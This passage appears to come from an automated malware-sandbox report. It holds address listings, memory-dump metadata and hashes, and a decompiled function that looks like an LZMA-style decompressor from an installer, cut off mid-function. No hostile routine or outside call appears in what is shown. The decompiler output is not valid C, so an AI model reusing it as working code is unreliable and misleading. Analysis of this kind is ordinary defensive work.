              0x00406e7e
              0x00406e81
              0x00406e85
              0x00406e88
              0x00406e8e
              0x00406e90
              0x00406e90
              0x00406e90
              0x00406e93
              0x00406e96
              0x00406e96
              0x00406e9c
              0x00406e3a
              0x00406e3a
              0x00406e3d
              0x00000000
              0x00406e3d
              0x00406e9e
              0x00406e9e
              0x00406ea1
              0x00406ea4
              0x00406ea7
              0x00406eaa
              0x00406ead
              0x00406eb0
              0x00406eb3
              0x00406eb6
              0x00406eb9
              0x00406ebc
              0x00406ed4
              0x00406ed7
              0x00406eda
              0x00406edd
              0x00406edd
              0x00406ee0
              0x00406ee4
              0x00406ee6
              0x00406ebe
              0x00406ebe
              0x00406ec6
              0x00406ecb
              0x00406ecd
              0x00406ecf
              0x00406ecf
              0x00406ee9
              0x00406ef0
              0x00406ef3
              0x00000000
              0x00406ef5
              0x00000000
              0x00406ef5
              0x00000000
              0x00407182
              0x00407182
              0x00407186
              0x004074ad
              0x00000000
              0x004074ad
              0x0040718c
              0x0040718f
              0x00407192
              0x00407196
              0x00407199
              0x0040719f
              0x004071a1
              0x004071a1
              0x004071a1
              0x004071a4
              0x00000000
              0x00000000
              0x00406f52
              0x00406f52
              0x00406f55
              0x004072c7
              0x004072c7
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040734e
              0x00407352
              0x00407370
              0x00407370
              0x00407370
              0x00407377
              0x0040737e
              0x00000000
              0x0040737e
              0x00407354
              0x00407357
              0x0040735a
              0x0040735d
              0x00407364
              0x00000000
              0x00000000
              0x0040743f
              0x00407442
              0x00407343
              0x00407343
              0x00000000
              0x00000000
              0x00407079
              0x0040707b
              0x00407082
              0x00407083
              0x00407085
              0x00407088
              0x00000000
              0x00000000
              0x00407090
              0x00407093
              0x00407096
              0x00407098
              0x0040709a
              0x0040709a
              0x0040709b
              0x0040709e
              0x004070a5
              0x004070a8
              0x004070b6
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040739b
              0x0040739b
              0x0040739f
              0x004074d7
              0x00000000
              0x004074d7
              0x004073a5
              0x004073a8
              0x004073ab
              0x004073af
              0x004073b2
              0x004073b8
              0x004073ba
              0x004073ba
              0x004073ba
              0x004073bd
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c0
              0x00000000
              0x00000000
              0x004070be
              0x004070c1
              0x004070f7
              0x00407227
              0x00407227
              0x00407227
              0x00407227
              0x0040722a
              0x0040722a
              0x0040722d
              0x0040722f
              0x004074b9
              0x00000000
              0x004074b9
              0x00407235
              0x00407238
              0x00000000
              0x00000000
              0x0040723e
              0x00407242
              0x00407245
              0x00407245
              0x00407245
              0x00000000
              0x00407245
              0x004070c3
              0x004070c5
              0x004070c7
              0x004070c9
              0x004070cc
              0x004070cd
              0x004070cf
              0x004070d1
              0x004070d4
              0x004070d7
              0x004070ed
              0x004070f2
              0x0040712a
              0x0040712a
              0x0040712e
              0x0040715a
              0x0040715c
              0x00407163
              0x00407166
              0x00407169
              0x00407169
              0x0040716e
              0x0040716e
              0x00407170
              0x00407173
              0x0040717a
              0x0040717d
              0x004071aa
              0x004071aa
              0x004071ad
              0x004071b0
              0x00407224
              0x00407224
              0x00407224
              0x00000000
              0x00407224
              0x004071b2
              0x004071b8
              0x004071bb
              0x004071be
              0x004071c1
              0x004071c4
              0x004071c7
              0x004071ca
              0x004071cd
              0x004071d0
              0x004071d3
              0x004071ec
              0x004071ee
              0x004071f1
              0x004071f2
              0x004071f5
              0x004071f7
              0x004071fa
              0x004071fc
              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00406e40
              0x00406e40
              0x00406e44
              0x00407489
              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00000000
              0x00000000
              0x00406fcb
              0x00406fcb
              0x00406fcf
              0x00407495
              0x00000000
              0x00407495
              0x00406fd5
              0x00406fd8
              0x00406fdb
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407001
              0x00407004
              0x00407006
              0x00407006
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x00407009
              0x00407009
              0x00000000
              0x00407009
              0x0040728a
              0x004074bf
              0x004074e1
              0x004074e7
              0x004074e9
              0x004074f0
              0x004074f2
              0x004074f9
              0x004074fd
              0x00000000
              0x00406aee
              0x004074f6
              0x004074f6
              0x00000000
              0x004074f6
              0x00407343
              0x004073c9
              0x004073cf
              0x004073d2
              0x004073d5
              0x004073d8
              0x004073db
              0x004073de
              0x004073e1
              0x004073e4
              0x004073ea
              0x00407403
              0x00407406
              0x00407409
              0x0040740c
              0x00407410
              0x00407412
              0x00407413
              0x00407416
              0x004073ec
              0x004073ec
              0x004073f4
              0x004073f9
              0x004073fb
              0x004073fe
              0x004073fe
              0x00407420
              0x00000000
              0x00407422
              0x00000000
              0x00407422
              0x00407420
              0x00000000
              0x00407295

              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5f17471a99a701cf31c58911c016ae07bdee3b17eca89a89cbbe770d5c4f1181
              • Instruction ID: 5a24a20e97f266d7e3441ea32a969c72ce760fd7697c8a443cfa4f07d4855531
              • Opcode Fuzzy Hash: 5f17471a99a701cf31c58911c016ae07bdee3b17eca89a89cbbe770d5c4f1181
              • Instruction Fuzzy Hash: 6F911170D04229CBEF28CF98C854BADBBB1FB44305F14816ED856BB291C7786A86DF45
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406FA7, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
              Download Yara Rule
              C-Code - Quality: 98%
              			E00406FA7() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004074FE))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
